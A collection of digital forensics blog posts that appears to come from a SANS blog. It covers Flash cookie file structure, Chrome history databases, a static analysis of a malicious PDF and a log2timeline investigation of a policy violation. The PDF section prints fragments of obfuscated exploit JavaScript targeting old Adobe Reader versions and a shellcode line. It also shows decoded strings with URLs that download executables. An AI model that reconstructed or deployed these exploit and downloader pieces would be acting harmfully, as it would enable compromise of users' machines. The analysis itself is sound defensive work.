Local Shared Objects, aka Flash Cookies

The Adobe Flash player can store various information regarding user settings to “remember” things like the preferred volume a user likes in a video player, saved game settings, whether or not the user allows the flash player to connect to the web camera, etc. With the introduction of various ad blocking software and privacy settings in the browsers, web developers and advertisers have increasingly started to use these files to store other information as well (see the paper “Flash Cookies and Privacy“). These files are now more often used to store the same information as can be found inside traditional browser cookies. The notion of flash cookies has been discussed previously on SANS blogs, both in the Digital Forensics Blog by Chad Tilbury and in the IT Audit one by David Hoelzer.

Despite the privacy modes of many browsers today, where they do not store any type of browser history on the local disk, local shared objects or flash cookies can still be collected, stored and examined to determine the browser history. This fact has proven to be very valuable to investigators so far, however that might change in the next released version, 10.1, where private browsing will be implemented in the player according to Adobe.

According to Adobe: “Instead of saving local storage (local shared objects, or LSOs) on disk as it does during normal browsing, Flash Player stores LSOs in memory during private browsing”. After this change Flash cookies will not be as affective in tracing user’s web behavior as it used to be when users use privacy modes in their browsers.  Despite that they are still very useful in tracking user behavior when privacy browsing is turned off, since Flash cookies are not cleared when users clear their browser cookies.

Few points about flash cookies:

  • The cookies can be viewed and managed with several tools, some of which are discused in this blog post.
  • Cookie information in a local shared object is not affected when the user clears his or hers cookies and it can be shared independent of the browser that is used.

Structure

The LSO is stored as a binary file in a network or big-endian style. The file is structured in three sections:

  • First 16 bytes are the file’s header.
  • The objects name in ASCII
  • A series of data objects, that contain the actual values of the LSO

Header

As noted above the first 16 bytes comprise the LSO header.  It is structured in the following way:

  • Two bytes magic value (should be 0x00bf)
  • Four bytes length of LSO file excluding the length and magic value.  So to get the correct total length this value should be increased by six.
  • Four bytes of magic value.  This value should be the ASCII value of TCSO.
  • Six bytes of padding, should always equal 0x00 04 00 00 00 00.

An example header is:

<00bf> {0000 004b} [5443 534f] <0004 0000 0000>

If the header above is examined a bit more closely it can bee seen that the length of the LSO file is 0x00 00 00 4b = 75.  If we add the length of the magic bytes in the beginning and the length of the int32 value that represent the length variable we get that the total length of the LSO file is 75+6 or 81 bytes (0x51).

Object Name

Following the header is the objects name.  The structure is simple:

  • First two bytes represent the length of the name part
  • The name part in ASCII, the length according to previous value
  • Four bytes of pad (should equal 0x00 00 00 00 )

An example name part is the following:

(0014) <796f 7574 7562 652e 636f 6d2f 7365 7474 696e 6773> {0000 0000}

The length of the name is stored inside the parenthesis, 0x14 or 20 bytes.  The next 20 bytes then represent the name part, in this case youtube.com/settings.

Data

After the name part ends a series of data start.  The data is type is structured in the following way:

  • Two bytes represent the length of the name in ASCII
  • The name of the data/variable
  • The type of the data/variable

There are several different data types available, each one represented differently. The available data types are:

  • 0x00 – NUMBER.  This is a double number so the next eight bytes represent the number.
  • 0x01 – BOOLEAN. One byte is read, either it is TRUE (value of 0x01) or FALSE (value of 0x00).
  • 0x02 – STRING. Contains two bytes representing the length of the string, followed by that amount of bytes in ASCII.
  • 0x03 – OBJECT. An object contains various data types wrapped inside a single data type.  It has the same structure as other data types, that is it begins with two bytes representing the length of the name part of the variable, followed by the name in ASCII and then one byte representing the data type, which is then read the same way as any other data type. is read.  The object then ends with the magic number of “0x00 00 09”.
  • 0x05 – NULL.  This is just a null object.
  • 0x06 – UNDEFINED.  This is also a null object, since it has not been defined.
  • 0x08 – ARRAY. The array contains the exactly the same structure as an object, except that it starts with four bytes representing the number of elements stored inside the array.  As with the objects it ends with the magic number of “0x00 00 09”.
  • 0x0B – DATE. A date object is ten bytes, beginning with a double number contained in the first eight bytes followed by a signed short integer (two bytes) that represents the time offset in minutes from Epoch time.  The double number represents an Epoch time in milliseconds.
  • 0x0D – NULL. As the name implies a null value.
  • 0x0F – XML. An XML structure begins with two bytes that should equal zero (0x00) followed by a string value (first two bytes represent the length of the XML, then an ASCII text containing the XML text).
  • 0x10 – CLASS. The class is very similar to that of an array or an object.  The only difference is a class starts with a name of the class.  The first two bytes represent the length of the name, followed by the name of the class in ASCII.  Then as usual additional data types that are contained within the class, ending with a magic value of “0x00 00 09”.

The tool log2timeline contains an input module that parses the structure of a .sol file and extracts all available timestamps to represent them in a super timeline.  An example usage of the tool is:

log2timeline -f sol -z local youtube.com/soundData.sol
0|[LSO] LSO created -> File: youtube.com/soundData.sol and object name: soundData variable: {mute = (FALSE), volume = (40)} |20835066|0|0|0|0|1262603852|1262603852|1262603852|1262603852
log2timeline -f sol -z local www.site.com/aa_user.sol
0|[LSO] lastVisit -> File: www.site.com/aa_user.sol and object name: aa_user variable: {usr_rName = (XXXXX), mainList = (Bruno_DVD_UK => banner2 => count => 1, hasClicked => no, lastVisit => Mon Nov 23 2009 15:43:37 GMT, count => 1, hasClicked => no), usr_rgdt = (Mon Nov 23 2009 15:43:37 GMT), usr_kbsr =  (0)} |20835107|0|0|0|0|1258991017|1258991017|1258991017|1258991017

Kristinn Guðjónsson, GCFA #5028, is the author of log2timeline and several other scripts as well as being the team leader of information security at Skyggnir, forensic analyst, incident handler an a local mentor for SANS.

Google Chrome Forensics

Google Chrome stores the browser history in a SQLite database, not unlike Firefox.  Yet the structure of the database file is quite different.

Chrome stores its files in the following locations:

  • Linux: /home/$USER/.config/google-chrome/
  • Linux: /home/$USER/.config/chromium/
  • Windows Vista (and Win 7): C:\Users\[USERNAME]\AppData\Local\Google\Chrome\
  • Windows XP: C:\Documents and Settings\[USERNAME]\Local Settings\Application Data\Google\Chrome\

There are two different versions of Google Chrome for Linux, the official packets distributed by Google, which stores its data in the google-chrome directory and the Linux distributions version Chromium.

The database file that contains the browsing history is stored under the Default folder as “History” and can be examined using any SQLlite browser there is (such as sqlite3).  The available tables are:

  • downloads
  • presentation
  • urls
  • keyword_search_terms
  • segment_usage
  • visits
  • meta
  • segments

The most relevant tables for browsing history are the “urls” table that contains all the visited URLs, the “visits” table that contains among other information about the type of visit and the timestamps and finally the “downloads” table that contains a list of downloaded files.

If we examine the urls table for instance by using sqlite3 we can see:

sqlite> .schema urls
CREATE TABLE urls(id INTEGER PRIMARY KEY,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,
typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL,
favicon_id INTEGER DEFAULT 0 NOT NULL);
CREATE INDEX urls_favicon_id_INDEX ON urls (favicon_id);
CREATE INDEX urls_url_index ON urls (url);

And the visits table

sqlite> .schema visits
CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit INTEGER,transition INTEGER DEFAULT 0 NOT NULL,segment_id INTEGER,is_indexed BOOLEAN);
CREATE INDEX visits_from_index ON visits (from_visit);
CREATE INDEX visits_time_index ON visits (visit_time);
CREATE INDEX visits_url_index ON visits (url);

So we can construct a SQL statement to get some information about user browser habit.

SELECT urls.url, urls.title, urls.visit_count, urls.typed_count, urls.last_visit_time, urls.hidden, visits.visit_time, visits.from_visit, visits.transition
FROM urls, visits
WHERE
 urls.id = visits.url

This SQL statement extracts all the URLs the user visited alongside the visit count, type and timestamps.

If we examine the timestamp information from the visits table we can see they are not constructed in an Epoch format.  The timestamp in the visit table is formatted as the number of microseconds since midnight UTC of 1 January 1601, which other have noticed as well, such as firefoxforensics.

If we take a look at the schema of the downloads table (.schema downloads) we see

CREATE TABLE downloads (id INTEGER PRIMARY KEY,full_path LONGVARCHAR NOT NULL,url LONGVARCHAR NOT NULL,
start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL);

And examine the timestamp there (the start_time) we can see that it is stored in Epoch format.

There is one more interesting thing to mention in the “visits” table.  It is the row “transition”.  This value describes how the URL was loaded in the browser.  For full documentation see the source code of page_transition_types or in a shorter version the core parameters are the following:

  • LINK. User go to the page by clicking a link.
  • TYPED. User typed the URL in the URL bar.
  • AUTO_BOOKMARK. User got to this page through a suggestion in the UI, for example,through the destinations page
  • AUTO_SUBFRAME. Any content that is automatically loaded in a non-toplevel frame. User might not realize this is a separate frame so he might not know he browsed there.
  • MANUAL_SUBFRAME. For subframe navigations that are explicitly requested by the user and generate new navigation entries in the back/forward list.
  • GENERATED. User got to this page by typing in the URL bar and selecting an entry that did not look like a URL.
  • START_PAGE. The user’s start page or home page or URL passed along the command line (Chrome started with this URL from the command line)
  • FORM_SUBMIT. The user filled out values in a form and submitted it.
  • RELOAD.  The user reloaded the page, whether by hitting reload, enter in the URL bar or by restoring a session.
  • KEYWORD. The url was generated from a replaceable keyword other than the default search provider
  • KEYWORD_GENERATED. Corresponds to a visit generated for a keyword.

The transition variable contains more information than just the core parameters.  It also stores so called qualifiers such as whether or not this was a client or server redirect and if this a beginning or an end of a navigation chain.

When reading the transition from the database and extracting just the core parameter the variable CORE_MASK has to be used to AND with the value found inside the database.

CORE_MASK = 0xFF,

I’ve created an input module to log2timeline to make things a little bit easier by automating this.  At this time the input module is only available in the nightly builds, but it will be released in version 0.41 of the framework.

An example usage of the script is the following:

log2timeline -f chrome -z local History
...
0|[Chrome] User: kristinng URL visited: http://tools.google.com/chrome/intl/en/welcome.html (Get started with Google Chrome) [count: 1] Host: tools.google.com type: [START_PAGE - The start page of the browser] (URL not typed directly)|0|0|0|0|0|1261044829|1261044829|1261044829|1261044829
...
0|[Chrome] User: kristinng URL visited: http://isc.sans.org/ (SANS Internet Storm Center; Cooperative Network Security Community - Internet Security) [count: 1] Host: isc.sans.org type: [TYPED - User typed the URL in the URL bar] (directly typed)|0|0|0|0|0|1261044989|1261044989|1261044989|1261044989..

The script reads the user name from the directory path the history file was found and then reads the database structure from the History file and prints out the information in a human readable form (this output is in mactime format).  To convert the information found here in CSV using mactime

log2timeline -f chrome -z local History > bodyfile
mactime -b bodyfile -d > body.csv

And the same lines in the CSV file are then:

Thu Dec 17 2009 10:13:49,0,macb,0,0,0,0,[Chrome] User: kristinng URL visited: http://tools.google.com/chrome/intl/en/welcome.html (Get started with Google Chrome) [count: 1] Host: tools.google.com type: [START_PAGE - The start page of the browser] (URL not typed directly)
Thu Dec 17 2009 10:16:29,0,macb,0,0,0,0,[Chrome] User: kristinng URL visited: http://isc.sans.org/ (SANS Internet Storm Center; Cooperative Network Security Community - Internet Security) [count: 1] Host: isc.sans.org type: [TYPED - User typed the URL in the URL bar] (directly typed)

 
Kristinn Guðjónsson, GCFA #5028, is the author of log2timeline and several other scripts as well as being the team leader of information security at Skyggnir, forensic analyst, incident handler an a local mentor for SANS.

PDF malware analysis

I decided to do some malware analysis as a part of some presentation I had to do. And since I went through the process, I decided to post it here if anyone is interested.

To begin with, I needed to find some malware to analyze.  And a great place to find live links to active malware is to visit the site:  Malware Domain List.

What I wanted to show was that despite having a fully patched machine with a fully updated AV is not always enough to protect you. One way to do that is to either find a PDF or Flash exploit. The one that I chose for this experiment was this one:

PDF exploit to be used
PDF exploit to be used

First things first, to download the malware example and do some static analysis on it. First of all I ran pdfid.py from Didier Stevens to get some ID about the PDF document

pdfid.py dhkn.pdf
PDFiD 0.0.9 dhkn.pdf
 PDF Header: %PDF-1.4
 obj                    9
 endobj                 9
 stream                 2
 endstream              2
 xref                   0
 trailer                1
 startxref              1
 /Page                  0
 /Encrypt               0
 /ObjStm                0
 /JS                    1
 /JavaScript            2
 /AA                    0
 /OpenAction            0
 /AcroForm              0
 /JBIG2Decode           0
 /RichMedia             0
 /Colors > 2^24         0

By looking at this we can see that there is a Javascript code in the document, which is commonly used to exploit Adobe Reader and we also see that there are some streams in the document. Now we need to take a closer look at the source code of the document. This can be done with any text editor, such as vim or just use less (or cat).

If we examine the document we don’t see any text part, just a stream that is JavaScript,

...
endstream
endobj
6 0 obj
<</CS /DeviceRGB /S /Transparency >>
endobj
7 0 obj
<</Length 76450 /Filter [/ASCIIHexDecode]>>
stream
7661722066686e7075783d27273b6567686a76783d22223b616567777a3d35303431323b6465757....
...

This stream can be easily decoded. We see that the filter that is used is a simple ASCIIHexDecode, so I simply copy the stream

grep ^stream dhkn.pdf -A 2  > stream

I then edit the file and deleted lines that did not belong to the stream itself. Since the file now contained only the hex code of the stream I could decode it with a simple Perl script

#!/usr/bin/perl

use strict;

my $line = undef;
my $string = undef;

my $file = shift;

die( 'Wrong usage: ' . $0 . ' FILE' ) unless -e $file;

open( FH, $file ) or die( 'Unable to read file ' . $file );
open( RW, '>' . $file . '.txt' );

while( $line = <FH> )
{
 print "Processing line\n";
 $line =~ s/\%//g;

 $string = pack 'H*', $line;
 print RW $string;
}

close( FH );
close( RW );

I run the script like this:

./conv.pl stream

The content of the text file stream.txt looks something like this

var fhnpux='';eghjvx="";aegwz=50412;deuv="";var fiqy='',lmuz=false,ekrt=true,gpqr=false,
hnrty='',hloqr=0,dimtz=String,afioxy=dimtz['fkrEoAmkCBhkaBrRCAoAdkeE'.replace(/[EABkR]/g,'')],
gilmq=String,abdmv=gilmq['eBvBaLlI'.replace(/[ILABJ]/g,'')],ikmqw="61",begily="",aefmos=[67,59,
63,151,171,159,153,165,159,160,164,81,156,154,174,144,159,165,94,170,151,163,169,161,98,81,162,...
...

Obviously a obfuscated JavaScript. So we need to dig a little deeper. To make it easier to read a simple substitution is done

cat stream.txt | sed -e 's/;/;\n/g' > stream.js

This makes the code a litte bit easier to read. Then to make it even more easy, vim is used to edit the file and add spaces and new lines where needed. There are two things in this code that are interesting (well the two most interesting things that pop up at least). First of all the function close to the end of the file:

lquv=function()
{
      for(var fjpu;hloqr<aefmos.length;hloqr+=1)
      {
                var fjqu=hloqr%ikmqw.length+1;
                var dorvy=ikmqw.substring(hloqr%ikmqw.length,fjqu);
                var blrwy=aefmos[hloqr];
                begily+=afioxy(blrwy-dorvy.charCodeAt(0));
        }
        abdmv(begily);
};
lquv();

We see that we have a function called “lquv” which is seems to take care of decoding the obfuscation of the code. We see in the end a function called “adbmv” is called with the parameter of begily, which is the variable that holds the decoded JavaScript. The function “adbmv” is defined above in the code:

gilmq=String
abdmv=gilmq['eBvBaLlI'.replace(/[ILABJ]/g,'')]

This is a very simple obfuscation. We see that “gilmq” is defined as a String and then “abdmv” is (when we complete the simple substition)

gilmq['eval']

So when the function calls “abdmv(begily)” we are about to evaluate or execute the code that is displayed in the variable begily. We therefore need to know what is inside the variable “begily”. The basis for “begily” resides in the variable “aefmos” (the second interesting thing we found), which is defined as:

aefmos=[67,59,6....

The easiest way (or at least an easy method) to decode this string is simply to modify the stream.js to a HTML document and open it up in a browser or other JavaScript interpreter.

We add to the top of the document

<html>
<head><title>TESTING</title></head>
<body>
<script>

And at the bottom

</script>
</body>
</html>

We then modify the JavaScript itself. First of all the document ends with a ?, which we delete. Then we modify the function “lquv” so that it prints the JavaScript instead of evaluating it.

lquv=function()
{
 for(var fjpu; hloqr<aefmos.length;hloqr+=1)
 {
 var fjqu=hloqr%ikmqw.length+1;
 var dorvy=ikmqw.substring(hloqr%ikmqw.length,fjqu);
 var blrwy=aefmos[hloqr];
 begily+=afioxy(blrwy-dorvy.charCodeAt(0));
 }
 //abdmv(begily);
 document.write(begily);
};

The change that I made is written in bold. I then open this document up in a sandboxed environment to get the variable begily decoded. This script looks like this:

function fix_it(yarsp, len)
{
 while (yarsp.length * 2 < len)
 {
 yarsp += yarsp;
 }

 yarsp = yarsp.substring(0, len/2);
...

Now we have the true JavaScript code that is to be run on the machine. Inside this there are several functions, some of which contain the magic variable name “shellcode” or “payload”, which is usually considered to be an indication of a malware (if the obfuscation isn’t enough). Near the end of the code we see this:

function pdf_start()
{
 var version = app.viewerVersion.toString();
 version = version.replace(/\D/g,'');
 var varsion_array = new Array(version.charAt(0), version.charAt(1), \
version.charAt(2));

 if ((varsion_array[0] == 8 ) && (varsion_array[1] == 0) || \
(varsion_array[1] == 1 && varsion_array[2] < 3))
 {
 util_printf();
 }

 if ((varsion_array[0] < 8 ) || (varsion_array[0] == 8 && \
varsion_array[1] < 2 && varsion_array[2] < 2))
 {
 collab_email();
 }

 if ((varsion_array[0] < 9 ) || (varsion_array[0] == 9 && \
varsion_array[1] < 1))
 {
 collab_geticon();
 }
}

pdf_start();

This function is called in the end and we can see that it begins by getting the Adobe Reader version code before going through an if sentence, trying to determine which exploit to use based on the version number. This particular exploit is used against Adobe Reader versions:

  • 8.0 or 8.1.0-8.1.2
  • Older versions than 8.0 or version 8.2.0-2
  • Older versions than 9.0 or 9.0

There are different exploits run based on on of listed criteria above. If we examine the payloads or shellcodes, we see that they are coded using the JavaScript function “escape” and are all similar to the one listed below:

var payload = unescape("%uEBE9%u0001%u5600%uA164%u0030%u0....

To further analyse this malware the payload has to be examined. So we copy the payload to a file and create a simple Perl script to change the JavaScript to binary:

#!/usr/bin/perl
use strict;
use Encode;

my $file = shift;
my $line = undef;
my $string = undef;
my @chars = undef;
my $done;

die('file does not exist') unless -e $file;

open( FH, $file ) or die( 'Unable to open file: ' . $file );
open( RW, '>' . $file . '.dat' );
binmode RW;

# read all lines
while( <FH> )
{
 @chars = split( /%u/ );
 print "Processing line..\n";
 print "LINE CONSISTS OF " . $#chars . " CHARS\n";

 $done = -1;
 foreach my $char (@chars )
 {
 $done++; # increase done by one
 next unless $done;

 print RW pack( 'v',hex( $char ));
 }

}

close(RW);
close( FH );

So to run the script

./decode_shell shell

Now I’ve got a binary document, called shell.dat which can be easily analysed using strings

strings -a -t x shell.dat
36 QQSVW`
65 B`;U
1a8 PhhC
1d5 PSSSSSS
1f3 QQSVWjB
209 a.ex
229 YYt9
243 YYt
 W
264 YYFF;
274 QSf`
2a1 t
 @8
2ba http://style-boards.com/forum/bmosz2.exe
2e3 http://style-boards.com/forum/click.php?r=

We see that this particular shellcode (the one that is used to exploit version 9.0) is simply downloading more malware to the machine. There are two files fetched, both of which at the time of analysis were removed from the server in question, so further analysis wasn’t possible.

To test the other payloads, we examine the one that exploits the util_printf vulnerability.

/decode_shell util_shell
Processing line..
LINE CONSISTS OF 391 CHARS
strings -a -t x util_shell.dat
...
209 a.ex
...
2ba http://style-boards.com/forum/cdruz2.exe
2e3 http://style-boards.com/forum/click.php?r=

And the collab_email exploit:

/decode_shell collab_email_shell
Processing line..
LINE CONSISTS OF 392 CHARS
strings -a -t x collab_email_shell.dat
...
209 a.ex
...
2ba http://style-boards.com/forum/fkntuw2.exe
2e4 http://style-boards.com/forum/click.php?r=

We can see that for each of the exploits there are two executable files downloaded. And the file that comes with “click.php?r=” seems to be the same one for each of them. The second executable does have a different name, fkntuw2.exe, cdrusz2.exe, bmosz2.exe

I was unable to analyze the executables further since they had all been removed from the server at the time I tried to download them, got a 404 error from the server. Although the PDF document still remained on the server the last time I checked.

This concluded the static analysis of the code, I also did a live dynamic analysis of the malware that I might share at a later time, but for now, let the static analysis do.

Artifact Timeline Creation and Analysis – part 2

In the last post I talked about the tool log2timeline, and mentioned a hypothetical case that we are working on.  Let’s explore in further detail how we can use the tool to assist us in our analysis.

How do we go about collecting all the data that we need for the case? In this case we know that the we were called to investigate the case only hours after the alleged policy violation, so timeline can be a very valuable source.  Therefore we decide to construct a timeline, using artifacts found in the system to start our investigation, so that we can examine the evidence with respect to time.  By doing that we both get a better picture of the events that occured as well as to possibly lead us to other artifacts that we need to examine closer using other tools and techniques.

To begin with you start by imaging the drive.  You take an image of the C drive (first partition) and start working on the image on your analysis workstation.  The first step is to create a traditional filesystem timeline you can refer to the already posted blog:

http://sansforensics.wordpress.com/2009/02/24/digital-forensic-sifting-registry-and-filesystem-timeline-creation/

Or for a quick reference, you can execute the following commands to get the filesystem timeline (assuming that the image name is suspect_drive.dd):

fls -m C: -r suspect_drive.dd > /tmp/bodyfile

After creating the traditional filesystem timeline we need to incorporate artifacts into it. To do that we need to mount the suspect drive, for instance by issuing this command:

mkdir /mnt/analyze
mount.ntfs-3g -o ro,nodev,noexec,show_sys_files,loop /analyze/suspect_drive.dd /mnt/analyze

Now the suspect drive is mounted as a read-only so we can inspect some of the artifacts found on the system.

cd /mnt/analyze/WINDOWS/Prefetch
log2timeline -f prefetch . >> /tmp/bodyfile

We start by navigating to the Prefetch directory, which stores information about recently started programs (created to speed up boot time of those processes) and run the tool against the Prefetch directory. The output is then stored in the same bodyfile as the traditional file system timeline. Then we navigate to the user that we are taking a closer look at to examine the UserAssist (stores information about recently run processes by that user) part of the user’s registry.

cd /mnt/analyze/Documents and Settings/joe
log2timeline -f userassist NTUSER.DAT >> /tmp/bodyfile

Now we have incorporated information found inside a particular user in the bodyfile. Next we examine the recycle bin

cd /mnt/analyze/RECYCLER
log2timeline -f recycler INFO2 >> /tmp/bodyfile

We also want to examine restore information, that is information found inside the restore points (creation time of restore points):

cd /mnt/analyze/System Volume Information/_restore{A4195436-6BCB-468A-8B2F-BEE5EB150433}/
log2timeline -f restore . >> /tmp/bodyfile

Since we are suspecting that the user Joe opened few documents we also want to examine the recent document folder of the user, so we incorporate information found inside Windows shortcut files into our case:

cd /mnt/analyze/Documents and Settings/joe/Recent
ls -b *.lnk | while read d; do log2timeline -f win_link "$d"; done

We also find out by examining “Program Files” folder (or by examining registry) that the Firefox browser is installed on the workstation (which is not allowed according to corporate policies).  So we add Firefox history into our timeline as well.

cd /mnt/analyze/Documents and Settings/joe/Application Data/Mozilla/Firefox/Profiles/dgml8g3t.default/
log2timeline -f firefox3 places.sqlite >> /tmp/bodyfile

Now we are ready to examine the timeline a little bit closer.  To modify the bodyfile into a useful timeline we use the tool mactime from TSK (The SleuthKit):

mactime -b /tmp/bodyfile 2009-08-01..2009-08-05 > /tmp/timeline

And now we can start examining the timeline itself. If we look at August 04 (which is the date that the HR department gave up as a possible date) we see from the information gathered in UserAssist that the user Joe ran the browser Internet Explorer at 15:13:42, which is confirmed by update of the access time of IEXPLORE.EXE file one second later.

joe running Internet Explorer
User running Internet Explorer

At 15:13:53 a Prefetch file is created for Internet Explorer and as indicated inside the Prefetch file Internet Explorer was last run at 15:13:43 (and has been run 11 times on this machine). This can be seen on the timeline below:

Internet Explorer being run
Internet Explorer being run

The tool log2timeline does not support index.dat files (at the time of this writing, although it will very soon), so for timeline analysis we have to rely on traditional file system analysis.  We can see that the cookie joe@mozilla[1].txt was created at 15:14:48, suggesting that the user Joe visited the size Mozilla.org.

joe visiting Mozilla site
joe visiting Mozilla site

We then see that the user joe created the file “joe@download.mozilla[1].txt” at 15:14:49, indicating that the user may have downloaded Mozilla browser (or Firefox).

joe downloading Firefox
joe downloading Firefox

This can then be confirmed by looking in the timeline from 15:16:10 where we see that Firefox is being set up on the machine.  We can then say that the user Joe has most likely installed Firefox on the machine.

Firefox being installed
Firefox being installed

Out suspicion that the user Joe had installed Firefox is then further strengthen when we see that a Firefox user profile is created at 15:16:11 inside Joe’s user directory.

Firefox profile created for user Joe
Firefox profile created for user Joe

And if we take a look at the Prefetch folder we see that Firefox was indeed set up on this machine, since we see that “FIREFOX SETUP 3.5.2[2].EXE” was run.  Firefox setup was run at 15:16:08 according to information found inside the Prefetch file.

Firefox setup being run
Firefox setup being run

We can then see that the Firefox browser was being run at 15:16:56 (last time it was run) and that it has been run three times.  This can be seen from the Prefetch part of the timeline.

Firefox being run
Firefox being run

Next in the timeline we can see Firefox 3 history, glanced from the places.sqlite file.  We see that when the user Joe opened up Firefox the default start page was run (the default page is Google, and since the language of the suspect machine is Icelandic, we are using the Icelandic version of Google, google.is)

Firefox start page
Firefox start page

We then see that the user Joe ran a Google search at 15:17:43.  The search terms were: “how to delete files”, hmm this might be interesting.. We then see that the user navigated to the site: “www.cybertechhelp.com/tutorial/article/how-to-delete-files-and-folders”.  This site has the title “How to delete files and folders” and the user navigated to this site from the site www.google.is.  This can all be seen in the timeline as shown below:

Google search in Firefox
Google search in Firefox

We then see that the user Joe continues to read up on “how-to delete files” sites:

Reading web site in Firefox
Reading web site in Firefox

And some more sites (how to delete files for good):

Reading up on how to delete files
Reading up on how to delete files

At 15:18:27 the user Joe starts reading up on wiping software.

Reading about wiping software
Reading about wiping software

And some more from the same site:

Reading about wiping software
Reading about wiping software

The user then goes to a page that seems to be related to downloading of the tool (the URL includes /download and the title of the page indicates a download site)

Downloading wiping tool
Downloading wiping tool

We then see that the user Joe has started some other activity on the machine. At 15:19:20 we see that the Windows shortcut (LNK) file “C:/Documents and Settings/joe/Recent/Very secret document.lnk”.  This is one of the documents that we were supposed to look for, one of the documents that the user Joe was not supposed to examine.  The creation of this link indicates that the document had been opened by the user, so we examine the timeline furhter.  We see from the information found inside the link file that the file points to: “C:/Documents and Settings/Administrator/My Documents/Very secret document.txt”, which again strengthens our case, since this seems to be really the document in question.  For further confirmation we see that the access time for this particular document was also updated at the same time as the other files were created.

We can then see from the UserAssist part of the timeline that the user Joe opened up NOTEPAD.EXE at 15:19:23 (the last time it was opened), and that the user had used this program twice.  At the same time, that is at 15:19:23 we also see that the document: “C:/Documents and Settings/joe/Recent/Not to be seen document.lnk” was created.  This is the other document that the HR department suspected Joe to open.  The information gathered from the LNK file indicates that this file points to the document “C:/Documents and Settings/Administrator/My Documents/Not to be seen document.txt”, suggesting that the user Joe opened this document as well (most likely using Notepad).  Then finally we see that the Prefetch file for NOTEPAD.EXE was created at 15:19:25, indicating that notepad had been run five times on the machine, last time at 15:19:23 (the same time that the documents were opened).

We see in the Prefetch file that Notepad had been opened five times, yet the UserAssist part of Joe’s registry indicates that he only opened it twice.  This indicates that other users must have used Notepad as well (the other three times).

At 15:19:26 we see that a new file has been created inside the recycle bin, file called Dc1.txt.  To gain further information about this file we examine the recycle bin information inside the timeline.  We then see that the file (according to INFO2) “C:/Documents and Settings/Administrator/My Documents/Not to be seen document.txt” had been deleted at 15:19:29 (three seconds after the file Dc1.txt was created).  Since the file Dc1.txt is created inside the folder “C:/RECYCLER/S-1-5-21-…-1004” we can be fairly certain that the user with the RID 1004 (RID is the last part of the SID, a unique ID for each user in Windows) deleted this file.  If we then examine the content of the SAM file (C:/WINDOWS/system32/config/SAM) with tools such as RegRipper we see that the user joe has the user id of 1004, suggesting that the user Joe deleted the file “Not to be seen document.txt”.  The picture below shows the timeline from this part:

Showing opened and deleted files
Showing opened and deleted files

After this activity with the secret documents we see that the user Joe continued to use Firefox, now clear indications that the user is in fact downloading a wiping software (instead of just visiting sites containing download section).  The user visits the site: “http://…..wipe3.exe” and the visit type is DOWNLOAD, indicating that this is in fact a download that is taking place.

We can then further confirm this suspicion by examining the timeline straight after the download took place.  We then see that the file ..wipe3.exe was created inside the folder: “C:/Documents and Settings/joe/My Documents/Niðurhal/bcwipe3.exe” (Niðurhal is the Icelandic word for Download).  This further suggests that it was in fact the user joe that downloaded the wiping software.

Downloading wiping software
Downloading wiping software

We can then see indications that the wiping software was indeed installed on the machine from the filesystem timeline.

Installing wiping software
Installing wiping software

We can then see from the Prefetch file that the software BCWIPE3.EXE was run on the machine, further suggesting that the file that the user Joe seems to have downloaded was in deed run on the machine.  We can then see some temporary files created by the installation program that reside inside joe’s user directory, further indicating that the user Joe really installed the software in question (there were other temporary files created inside joe’s folder as well that belonged to the software bcwipe3.exe)

Prefetch confirmation of installing wiping software
Prefetch confirmation of installing wiping software

The final line in the timeline indicating that the user Joe installed the wiping software can be found inside the UserAssist part of the registry.  We can se that the user Joe did run the lnk file: “BCWipe 3.0/BCWipe Task Manager.lnk”, indicating that he ran a part of the software after installation (a task manager that comes with the software).

User Joe installing Wiping software
User Joe installing Wiping software

To sum up this little example we found out, by examining the timeline (using artifacts inside the timeline), all events take place on the 4th of August this year:

  • 15:13:43: Internet Explorer is started
  • 15:14:48: Internet Explorer is used by the user joe to visit the site “mozilla.org”
  • 15:14:49: Internet Explorer is used by the user joe to visit the site “download.mozilla.org”
  • 15:16:08: The browser Firefox is installed on the machine
  • 15:16:11: A Firefox user profile is created for the user joe
  • 15:16:56: Firefox browser is started
  • 15:17:00: User joe visits the start page of Firefox (using Firefox)
  • 15:17:43: User joe searches for “how to delete files”, using Google search engine
  • User joe then reads few web pages which clearly indicate direction on how to delete files and folders
  • 15:16:11: User joe starts reading about tools that wipe files
  • 15:19:20: A shortcut file is created inside recent document history of user Joe, indicating that the file “Very secret document.txt” had been opened by the user
  • 15:19:23. The last time that the user Joe opened NOTEPAD.EXE
  • 15:19:23: A shortcut is created inside recent document history of user Joe, indicating that the file “Not to be seen document.txt” had been opened by the user joe
  • 15:19:26: The file Dc1.txt was created inside the recycle bin (inside a folder that belongs to the user joe).  This file used to be named “Not to be seen document.txt” before it was moved to the recycle bin
  • 15:19:37: A wiping software is downloaded from the Internet, using Firefox (and by the user Joe)
  • 15:21:16: The wiping software is installed, leaving temporary files inside Joe’s user directory, indicating that the user Joe is in fact the user that is installing the software
  • 15:21:44: The user Joe runs a software that belongs to the wiping software (UserAssist)

Although this case is very simple, and we managed to image the computer few minutes after the alleged breach of policy we can clearly see that correlating different information found inside log files and other OS artifacts can prove to very helpful in our investigations and at least point us to data that we need to examine using other techniques.

Artifact Timeline Creation and Analysis – Tool Release: log2timeline

Using timeline analysis during investigations can be extremely useful yet it sometimes misses important events that are stored inside files on the suspect system (log files, OS artifacts).  By solely depending on traditional filesystem timeline you may miss some context that is necessary to get a complete picture of what really happened.  So to get “the big picture”, or a complete and accurate description we need to dig deeper and incorporate information found inside artifacts or log files into our timeline analysis. These artifacts or log files could reside on the suspect system itself or in another device, such as a firewall or a proxy (or any other device that logs down information that might be relevant to the investigation).

